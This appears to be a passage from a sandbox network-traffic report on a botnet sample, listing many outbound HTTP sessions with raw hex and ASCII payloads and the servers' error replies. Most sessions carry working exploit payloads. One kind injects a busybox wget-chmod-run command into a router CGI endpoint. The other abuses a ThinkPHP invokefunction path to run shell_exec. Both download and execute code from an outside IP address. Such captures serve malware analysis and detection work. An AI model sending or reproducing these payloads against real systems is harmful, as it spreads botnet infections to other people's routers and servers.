                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        183192.168.2.145819494.62.172.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.512295961 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:16.745444059 CET469INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:16 GMT
                                                        X-Frame-Options: SAMEORIGIN
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Content-Length: 231
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 4f 4d 6b c3 30 0c bd e7 57 68 bd cf 72 4a 19 1d 18 c3 da a4 ac d0 6d 61 4b 0f 3d 3a b5 21 85 2c 4e 65 65 63 ff 7e 4a c3 0e bb 08 9e de 87 9e cc 5d f1 b6 ad 4f 55 09 cf f5 cb 01 aa e3 e6 b0 df c2 e2 1e 71 5f d6 3b c4 a2 2e 66 66 a9 34 62 f9 ba b0 99 69 f9 b3 b3 a6 0d ce 0b e0 0b 77 c1 ae b4 86 8d f3 f0 1e ae 63 48 6c 70 5e 67 06 6f 32 d3 44 ff 33 39 73 fb 4f 25 38 33 83 3d c5 91 a0 a1 f8 9d 02 41 0a 3d 83 03 9a 93 80 5b c7 32 2e 49 08 fa 12 fe 1c c7 ce 43 1f 19 c6 de 07 4a ec 7a af 4c 43 80 92 85 c3 74 85 64 38 ef 29 a4 64 9f 06 77 6e 03 7c cc 66 c9 ca 1f 97 2a 7f 58 2b ad f2 15 54 91 18 d6 da e0 9f 5c 22 6e 5d a5 f8 f4 65 f6 0b 27 c3 0a 06 20 01 00 00
                                                        Data Ascii: UOMk0WhrJmaK=:!,Neec~J]OUq_;.ff4biwcHlp^go2D39sO%83=A=[2.ICJzLCtd8)dwn|f*X+T\"n]e'


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        184192.168.2.144214494.120.240.2078080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.527601957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        185192.168.2.145135094.123.255.768080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.527836084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        186192.168.2.143895894.123.188.2068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.527896881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        187192.168.2.144061094.120.208.1928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.529386044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        188192.168.2.145815894.122.121.1128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.529874086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        189192.168.2.1445400112.124.41.11880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.565502882 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:16.916528940 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        190192.168.2.145827295.101.151.13480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.596111059 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:16.799082041 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:16 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:16 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 63 36 33 32 36 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 36 26 23 34 36 3b 33 30 61 38 30 37 64 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ec632617&#46;1707899596&#46;30a807d1</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        191192.168.2.145642695.216.102.15580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.622756004 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:16.852443933 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        192192.168.2.143595695.111.202.3480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.915796041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:17.270179987 CET903INHTTP/1.1 400 Bad Request
                                                        content-type: text/html
                                                        cache-control: private, no-cache, max-age=0
                                                        pragma: no-cache
                                                        content-length: 679
                                                        date: Wed, 14 Feb 2024 08:33:17 GMT
                                                        server: LiteSpeed
                                                        connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        193192.168.2.144602062.228.228.168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:18.477097988 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:18.718055010 CET464INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:33:18 GMT
                                                        Connection: Close
                                                        Cache-Control: no-store
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: DENY
                                                        Strict-Transport-Security: max-age=4250666; includeSubDomains
                                                        Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.airtel.cy *.ookla.com *.speedtest.net *.airtel.com.cy *.speedtestcustom.com; upgrade-insecure-requests


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        194192.168.2.143913031.200.125.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:18.483572960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        195192.168.2.145496031.136.185.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:18.698220968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:19.368491888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:20.712430000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:23.432421923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.808126926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.559664011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:02.342698097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349040985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        196192.168.2.145622431.41.165.1828080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:18.709788084 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
